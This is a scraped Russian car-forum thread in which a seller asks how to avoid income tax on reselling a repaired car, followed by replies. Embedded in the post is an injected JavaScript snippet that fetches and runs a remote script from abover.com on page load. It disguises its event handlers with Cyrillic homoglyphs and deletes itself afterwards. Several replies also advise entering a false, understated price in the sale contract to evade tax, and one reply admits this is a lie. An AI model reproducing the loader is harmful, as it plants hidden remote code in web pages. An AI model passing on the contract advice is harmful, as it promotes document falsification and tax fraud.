14 мая
Kia Rio 1.4 MT
Владею с 2013, второй владелец. Изготовлена в Корее. Брал с пробегом 95 тыс., ездим мало, поэтому за 10 лет дошло до отметки 150 тыс. Из проблем -...
5
20 мая
Kia Sportage 2.0 AT 150hp 4WD
Машиной доволен. Для семьи из 4 человек норм, багажник вместителен. На трассе чувствует себя уверенно, устойчивость нормальная. Управление тоже нор...
4.7
Все отзывы
Уважаемые пользователи! С 20 декабря Форум Авто закрыт для общения. Выражаем благодарность всем нашим пользователям, принимавшим участие в дискуссиях и горячих спорах. Редакция сосредоточится на выпуске увлекательных статей и новостей, которые вы сможете обсудить в комментариях. Не пропустите!

Можно ли избежать налога с разницы при перепродаже авто?...

(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/extension?ifra...' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8';
script.оnlоad = script.оnerrоr = function () {
script.оnlоad = script.оnerrоr = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})(); Скажу сразу, перепродажей не занимаюсь ни профессионально, ни любительски, однако по сути близко... Ситуация такая. В январе 2013 г купила подержанную аварийную машину, 2 месяца как из салона, за 1200 000руб. ремонт обошёлся в 350 тыс + тюнинг, обвесы и доработка у официалов ещё 200 тыс. Итого 1 млн 750 тыс руб. Поездить толком на ней не удалось- командировка 2 недели затянулась на 6 месяцев, далее лечение в стационаре 2 месяца, домой вернулась в декабре и выставила авто на продажу за 1800 000, приплюсовав к итогу 50 тыс транспортного налога, который придётся заплатить за этот год. Цена сильно ниже рыночной за срочность и бывшую аварийность, ну и у меня не было умысла наварить на этом, забрали авто в тот же день. Сейчас предстоит заполнить декларацию. Разница между покупной и продажной стоимостью облагается налогом на прибыль, но у меня по сути прибыли то и нет. Есть ещё один нюанс. За ремонт и тюнинг авто в сервисе по счётам расплатилась организация, в которой я на тот момент работала. Конечно, не своими средствами, а не выплаченной мне частью моей же зарплаты, накопившейся за год. То есть чеков на ремонтные работы у меня нет. Кто что думает по этому поводу? Плиз, личный опыт, статьи, ссылки. В первую очередь интересуют законные способы не платить налог в такой ситуации, а потом уже альтернативные.
наталья харлова
Тема закрытаТема в горячихТема скрыта
Жалоба принята. Спасибо!
Ошибка отправки
КомментарииКомментарииПока ни одного комментария, будьте первым!
26
12
Александр Мазрухо
ДКП на сумму не более 250000.Главное,чтобы покупатель согласился на эту запись.В инете есть все разъяснения по продаже машины ранее 3 лет владения и уплате налога с продажи.
СсылкаПожаловаться
ВикторВ ответ на Александр Мазрухо
Александр Мазрухо
ДКП на сумму не более 250000.Главное,чтобы покупатель согласился на эту запись.В инете есть все разъяснения по продаже машины ранее 3 лет владения и уплате налога с продажи.
СсылкаПожаловаться
Главное, чтобы продажная цена по ДКП были ниже цены по ДКП при покупке, т.е. чтобы не было прибыли. Довольно часто машины менял, в т.ч. одну до 3-х лет. Оформлял декларации, требовались только подлинные документы, а не копии, подтверждающие отсутствие прибыли. При одном из обменов получилось так, что утерялся ДКП при покупке. Сразу в налоговой предупредили - ищи, или придется платить. Пришлось обращаться в салон, где покупал. Имелась копия, все квитанции, по ней сделали новую копию, но уже с синей печатью. От налога ушёл без обмана.
СсылкаПожаловаться
Комментарий удален.Почему?
Александр МазрухоВ ответ на Федя
Комментарий удален.Почему?
Не важно,за сколько купил и сколько потом потратил.Главное-за сколько потом продал.В этом году товарищ продал бмв7 менее 3 лет поставив в ДКП 245т,представил копию его в налоговую и все.Никакого налога.Ну очень срочно нужны были деньги.За сколько хотел,за столько и продал.Все прекрасно знают,что это вранье,но законы такие,почему бы воспользоваться этой черной дырой.
СсылкаПожаловаться
Комментарий удален.Почему?
Александр МазрухоВ ответ на Федя
Комментарий удален.Почему?
История переписки3
Тогда придется платить.
СсылкаПожаловаться
Комментарий удален.Почему?
Комментарий удален.Почему?
Юрок3003В ответ на Федя
Комментарий удален.Почему?
История переписки2
1800000-1200000=600000-250000=350000*13%=45500
СсылкаПожаловаться
Комментарий удален.Почему?
наталья харловаВ ответ на Федя
Комментарий удален.Почему?
История переписки4
Вы, если тему не поняли, глупости не пишите. Купила битую за 250 000, восстановила, потратив 100 000, продала за 380 000. Почему я должна платить налог с разницы 130 000, ведь фактически мой доход 380 000-(250 000+100 000)=30 000. С него и согласна заплатить требуемое. Если при этом учесть стоимость страховки ( а без неё никак) и транспортный налог, то получается я совсем в минусах. И ещё дополнительно с меня хотят налог взыскать с дохода, которого фактически нет. Растолкуйте блондинке, может я чего не понимаю. На цифры не обращайте внимания, это так, для примера
СсылкаПожаловаться
Комментарий удален.Почему?
наталья харловаВ ответ на Федя
Комментарий удален.Почему?
История переписки6
Внизу ссылка Веры Кудряшовой. Расходы на тюнинг( ну и ремонт, конечно) можно вычесть и вывести из под налогов при наличии чеков. Это не поучение, по себе знаю, не всегда хватает терпения изучить вопрос до конца и добраться до истины. Или опять войти в тему, мож кто чё дельное вбросил. Знания лишними не бывают.
СсылкаПожаловаться
Юрок3003В ответ на наталья харлова
наталья харлова
Вы, если тему не поняли, глупости не пишите. Купила битую за 250 000, восстановила, потратив 100 000, продала за 380 000. Почему я должна платить налог с разницы 130 000, ведь фактически мой доход 380 000-(250 000+100 000)=30 000. С него и согласна заплатить требуемое. Если при этом учесть стоимость страховки ( а без неё никак) и транспортный налог, то получается я совсем в минусах. И ещё дополнительно с меня хотят налог взыскать с дохода, которого фактически нет. Растолкуйте блондинке, может я чего не понимаю. На цифры не обращайте внимания, это так, для примера
СсылкаПожаловаться
История переписки5
Вы, если тему не поняли, глупости не пишите. Купила битую за 250 000, восстановила, потратив 100 000, продала за 380 000. Почему я должна платить налог с разницы 130 000, ведь фактически мой доход 380 000-(250 000+100 000)=30 000. С него и согласна заплатить требуемое. Если при этом учесть стоимость страховки ( а без неё никак) и транспортный налог, то получается я совсем в минусах. И ещё дополнительно с меня хотят налог взыскать с дохода, которого фактически нет. Растолкуйте блондинке, может я чего не понимаю. На цифры не обращайте внимания, это так, для примера
Вот если бы так было как вы сейчас написали, то ничего платить не пришлось бы. А если как в первом посте, то, как я писал выше - 1800000-1200000=600000-250000=350000*13%=45500
СсылкаПожаловаться
Юрок3003В ответ на Федя
Комментарий удален.Почему?
История переписки4
Че то у меня такой расклад не складывается. Купил за 250, продал за 300, будь добр с 50 тысяч налог заплатить. А по твоему, купил за миллион, продал за 1.25 миллиона и опана, платить ненадо :)

Да, по МОЕМУ платить не надо, так как 250000 не облагаемый налогом минимум.
СсылкаПожаловаться
наталья харловаВ ответ на Юрок3003
Юрок3003
Че то у меня такой расклад не складывается. Купил за 250, продал за 300, будь добр с 50 тысяч налог заплатить. А по твоему, купил за миллион, продал за 1.25 миллиона и опана, платить ненадо :)

Да, по МОЕМУ платить не надо, так как 250000 не облагаемый налогом минимум.
СсылкаПожаловаться
История переписки5
Посмотрите ссылку внизу. Нет такого понятия "не облагаемый минимум". Закон предлагает два варианта. Заплатить налог с разницы 600 000*13%=78 000 либо 1800 000 - 250 000= 1550 000* 13%=... лень считать , но и так понятно, что до х... По моему как то так.
СсылкаПожаловаться
Андрей Германов
Составьте ДКП на сумму в 1 100 000 руб. и все проблемы будут решены при условии,что у вас есть документы,подтверждающие,что машину вы купили за 1 200 000 руб.
СсылкаПожаловаться
Митя Бубликов
Все-таки странные люди в России с начала делают, а потом думают, было наоборот страна бы процветала.
Налоговую не интересуют ваши ремонты и тюнинги, ее интересуют документы ДКП на продажу и ДКП на покупку.
СсылкаПожаловаться
Николай Буров
Если ДКП на 1800 000 уже засвечен в ГАИ и машина поставлена по этому ДКП на учет, то сделать уже ничего нельзя. Если еще нет - то договариваться с покупателем и делать второй ДКП на 1150 000 к примеру. Если согласятся конечно. Надеюсь ДКП покупки на 1200 000 у вас есть? Иначе придется уже не 78 тысяч заплатить, а больше 200.
СсылкаПожаловаться
наталья харлова
Спасибо всем откликнувшимся. Вариант с "неправильными" ценами в ДКП мне известен и успешно используется не только мной, но и большинством населения страны. Однако все мои машины были сильно б/у и стоили на порядок меньше, эта - скорее исключение в силу сложившихся обстоятельств. При таких ценах указать нереальную сумму при купле- продаже занятие рискованное, в случае расторжения ДКП по суду можно сильно угореть, значительно больше, чем на 78 000 подоходного с разницы. Тем более, если продавец или покупатель настаивает на искажении суммы, это вызывает подозрение. Вообще, меня интересует сам процесс, так сказать. Можно ли по закону исключить суммы, потраченные на восстановительный ремонт, из налогооблагаемой базы? И ещё вопрос знатокам. Закон сейчас позволяет заключать ДКП устно при личном присутствии продавца и покупателя в ГИБДД. При этом, никакой копии ДКП с суммой сделки в регистрационном подразделении не остаётся, а на руках у сторон - только расписка в получении денег. Что тогда подавать в налоговую? Копию расписки? А не пошлют ли они меня далеко- далеко? Спросила бы у налоговиков, но пока нет возможности добраться до них, а телефон ...трубку не снимают уже неделю ни по одному номеру. Поделитесь опытом.
СсылкаПожаловаться
12
Чтобы оставить комментарий, вам нужно авторизоваться.
Вы не ввели текст комментария
Вы не ввели текст комментария